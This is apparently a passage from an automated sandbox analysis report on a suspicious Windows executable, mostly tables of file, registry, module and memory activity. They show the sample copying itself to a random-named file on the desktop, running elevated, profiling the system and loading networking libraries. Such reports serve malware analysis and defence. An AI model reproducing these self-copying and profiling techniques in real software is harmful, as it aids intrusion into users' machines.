| Copy | C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe | source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe |
|
1 | |
| Read | - | size = 512, size_out = 512 |
|
1 | |
| Read | - | size = 65024, size_out = 65024 |
|
18 | |
| Read | - | size = 65024, size_out = 65024 |
|
18 | |
| Read | - | size = 65024, size_out = 62464 |
|
1 | |
| Read | - | size = 62464, size_out = 62464 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 224, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_PAGE_PRIORITY |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #5: nwserbna.exe
514
2
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe |
| Command Line | "C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe" -n |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:45, Reason: Self Terminated |
| Monitor Duration | 00:02:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x340 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
70C
0x
CF4
0x
CE0
0x
CF0
0x
CF8
0x
CE4
0x
D54
0x
D60
0x
D0
0x
D5C
0x
DD4
0x
D68
0x
DC0
0x
D58
0x
D50
0x
D2C
0x
D28
0x
D10
0x
D3C
0x
D24
0x
D20
0x
CC8
0x
CCC
0x
F0
0x
CD0
0x
D0C
0x
CDC
0x
DDC
0x
CC0
0x
CC4
0x
D4C
0x
D48
0x
D34
0x
D40
0x
D44
0x
D64
0x
D38
0x
D30
0x
DE4
0x
E2C
0x
E58
0x
6B4
0x
C9C
0x
DE8
0x
D14
0x
C24
0x
5B8
0x
2EC
0x
E54
0x
E50
0x
E40
0x
E48
0x
E4C
0x
E44
0x
DD0
0x
DD8
0x
E24
0x
E28
0x
CB0
0x
C2C
0x
C20
0x
E3C
0x
924
0x
564
0x
E80
0x
E60
0x
304
0x
518
0x
208
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| nwserbna.exe | 0x00400000 | 0x00539fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x008b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00a40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x01e4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01f8ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01f90000 | 0x022c6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x023cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x0260ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002610000 | 0x02610000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002710000 | 0x02710000 | 0x0274ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x0284ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x029cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d90000 | 0x02d90000 | 0x02e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e90000 | 0x02e90000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ed0000 | 0x02ed0000 | 0x02fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x0300ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003110000 | 0x03110000 | 0x0314ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0324ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003390000 | 0x03390000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033d0000 | 0x033d0000 | 0x034cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000034d0000 | 0x034d0000 | 0x0350ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003510000 | 0x03510000 | 0x0360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003610000 | 0x03610000 | 0x0364ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003650000 | 0x03650000 | 0x0374ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003750000 | 0x03750000 | 0x0378ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003790000 | 0x03790000 | 0x0388ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x038cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038d0000 | 0x038d0000 | 0x039cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039d0000 | 0x039d0000 | 0x03a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a10000 | 0x03a10000 | 0x03b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b10000 | 0x03b10000 | 0x03b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b50000 | 0x03b50000 | 0x03c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c50000 | 0x03c50000 | 0x03c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d90000 | 0x03d90000 | 0x03dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ed0000 | 0x03ed0000 | 0x03f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f10000 | 0x03f10000 | 0x0400ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004010000 | 0x04010000 | 0x0404ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004050000 | 0x04050000 | 0x0414ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004150000 | 0x04150000 | 0x0418ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x0428ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x042cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x043cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x0440ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004410000 | 0x04410000 | 0x0450ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x0454ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0464ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x0468ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004790000 | 0x04790000 | 0x047cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x048cffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| winrnr.dll | 0x74360000 | 0x7436afff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74370000 | 0x74382fff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x74390000 | 0x743a5fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x743b0000 | 0x743c1fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74400000 | 0x74407fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x74410000 | 0x74455fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74460000 | 0x74467fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74470000 | 0x7449ffff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x744a0000 | 0x74523fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x74530000 | 0x7457dfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74580000 | 0x7459bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x745a0000 | 0x745bafff | Memory Mapped File | rwx |
|
|
|
- |
| wkscli.dll | 0x745c0000 | 0x745cffff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x745d0000 | 0x745d9fff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x745e0000 | 0x745f2fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x74600000 | 0x74607fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x74d30000 | 0x74d8bfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x770c0000 | 0x770c6fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x770d0000 | 0x77161fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77170000 | 0x77259fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007fe56000 | 0x7fe56000 | 0x7fe58fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe59000 | 0x7fe59000 | 0x7fe5bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe5c000 | 0x7fe5c000 | 0x7fe5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe5f000 | 0x7fe5f000 | 0x7fe61fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe62000 | 0x7fe62000 | 0x7fe64fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe65000 | 0x7fe65000 | 0x7fe67fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe68000 | 0x7fe68000 | 0x7fe6afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fe6b000 | 0x7fe6b000 | 0x7fe6dfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 130 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (264)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | -n | type = file_attributes |
|
5 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 14 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
79 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
146 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 |
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Module (93)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x74f40000 |
|
1 | |
| Load | ws2_32.dll | base_address = 0x74d30000 |
|
1 | |
| Get Handle | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | base_address = 0x400000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
6 | |
| Get Handle | c:\windows\syswow64\oleaut32.dll | base_address = 0x770d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x77170000 |
|
1 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwserbna.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe, size = 522 |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\nwserbna.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe, size = 261 |
|
3 | |
| Get Filename | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | process_name = c:\users\ciihmnxmn6ps\desktop\nwserbna.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x74f595e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPreferredUILanguages, address_out = 0x74f59a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadUILanguage, address_out = 0x74f5d980 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x74f5a410 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDiskFreeSpaceExW, address_out = 0x74f662d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
2 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VariantChangeTypeEx, address_out = 0x770e7e70 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNeg, address_out = 0x77130400 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarNot, address_out = 0x77131670 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAdd, address_out = 0x77108460 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarSub, address_out = 0x77109960 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMul, address_out = 0x77109090 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDiv, address_out = 0x77130910 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarIdiv, address_out = 0x771312b0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarMod, address_out = 0x77131510 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarAnd, address_out = 0x770ff9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarOr, address_out = 0x77131720 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarXor, address_out = 0x771318c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCmp, address_out = 0x770f4040 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarI4FromStr, address_out = 0x770f4b50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR4FromStr, address_out = 0x770ff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarR8FromStr, address_out = 0x77101740 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarDateFromStr, address_out = 0x770f5a80 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarCyFromStr, address_out = 0x77132e50 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBoolFromStr, address_out = 0x770f20d0 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromCy, address_out = 0x770f5240 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromDate, address_out = 0x770f5420 |
|
1 | |
| Get Address | c:\windows\syswow64\oleaut32.dll | function = VarBstrFromBool, address_out = 0x770f2080 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstanceEx, address_out = 0x7745baf0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x773fcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoAddRefServerProcess, address_out = 0x7745d120 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoReleaseServerProcess, address_out = 0x77461970 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoResumeClassObjects, address_out = 0x77466640 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoSuspendClassObjects, address_out = 0x773d1f60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77709da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77715860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77713370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x752c2850 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x74d3dca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = __WSAFDIsSet, address_out = 0x74d42f20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = closesocket, address_out = 0x74d39ba0 |
|
1 | |
